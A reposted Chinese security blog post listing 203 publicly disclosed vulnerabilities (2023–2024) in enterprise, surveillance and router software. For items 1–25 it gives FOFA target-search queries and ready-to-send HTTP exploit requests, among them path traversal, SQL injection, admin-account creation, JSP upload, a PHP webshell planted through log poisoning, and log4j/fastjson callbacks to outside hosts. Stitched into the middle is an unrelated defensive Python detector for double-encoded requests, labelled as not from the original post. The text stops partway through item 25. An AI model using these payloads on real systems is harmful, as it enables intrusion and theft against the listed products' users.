Compilation of publicly disclosed internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises; we hope this article is of some help to defenders, who can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all taken from other public accounts or websites and compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of space limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: if the content infringes any party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version; press F12 and search for the keyword when using it.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information leak
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <=20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and below authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS ocean video management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information leak
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 proactive safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-one login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
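Added example, not from the original post: a defender-side normaliser for requests encoded the way the keyword above is. A WAF rule or log monitor that percent-decodes only once sees `%27%20...` and matches nothing, so this code decodes until the text stops changing, records how many passes that took (normal clients encode once, so two or more passes is itself a signal) and then matches the decoded value against a few signatures for the primitives that recur in this list (extractvalue/updatexml, waitfor delay, `../`, `${jndi:`). The function names, the signature labels and the sample request targets are constructed for this example; the sample statement is the one shown above, and the page-style prefix is the first bytes of the keyword in the request above.

```python
"""Fixed-point percent-decoding with signature matching (constructed example)."""
import re
from urllib.parse import quote, unquote, urlsplit

MAX_DECODE_ROUNDS = 5  # cap so a crafted input cannot keep the loop running

# Matched against the fully decoded text, so encoding depth no longer matters.
# The labels are constructed for this example.
SIGNATURES = {
    "mysql_error_based_sqli": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "mssql_time_based_sqli": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "path_traversal": re.compile(r"(^|[/\\])\.\.([/\\]|$)"),
    "jndi_lookup": re.compile(r"\$\{jndi:", re.I),
}


def decode_to_fixpoint(value, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until nothing changes; return (decoded_text, rounds_used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def split_query(raw_query):
    """Split a query string into (key, raw_value) pairs WITHOUT decoding them.
    parse_qsl would already decode once and hide the extra encoding layer."""
    pairs = []
    for item in raw_query.split("&"):
        if item:
            key, _, val = item.partition("=")
            pairs.append((key, val))
    return pairs


def inspect_target(request_target):
    """Inspect one request target (path + query) as a web server logs it.
    Returns a list of (signature_name, location, decode_rounds) tuples."""
    parts = urlsplit(request_target)
    findings = []
    path, path_rounds = decode_to_fixpoint(parts.path)
    for name, pattern in SIGNATURES.items():
        if pattern.search(path):
            findings.append((name, "path", path_rounds))
    for key, raw_val in split_query(parts.query):
        val, rounds = decode_to_fixpoint(raw_val)
        for name, pattern in SIGNATURES.items():
            if pattern.search(val):
                findings.append((name, key, rounds))
    return findings


# Constructed samples. ORIGINAL_STATEMENT is the statement from the note above;
# DOUBLE_ENCODED encodes it twice with quote(), which leaves letters alone.
# PAGE_STYLE_PREFIX is the start of the keyword in the request above, which
# encodes every character (%25%32%37 -> %27 -> ').
ORIGINAL_STATEMENT = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
DOUBLE_ENCODED = quote(quote(ORIGINAL_STATEMENT, safe=""), safe="")
PAGE_STYLE_PREFIX = "1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34"

SAMPLE_TARGETS = [
    "/search/index.php?keyword=1" + DOUBLE_ENCODED,  # double-encoded SQLi
    "/static/..%2F..%2F..%2Fetc%2Fpasswd",           # single-encoded traversal
    "/api/v1/userlist?pageindex=0&pagesize=10",      # benign request
]


def scan(targets=SAMPLE_TARGETS):
    """Run the inspector over each target; returns {target: findings}."""
    return {target: inspect_target(target) for target in targets}


if __name__ == "__main__":
    for target, findings in scan().items():
        print(target[:50], "->", findings or "clean")
```

The round counter is worth alerting on by itself: a value that needs two decode passes to become readable was deliberately encoded twice, whatever it turns out to contain.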

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the file is uploaded, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani in the response is used for the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function is executed and base64 encoding is applied.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the test range to execute the id command; the ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
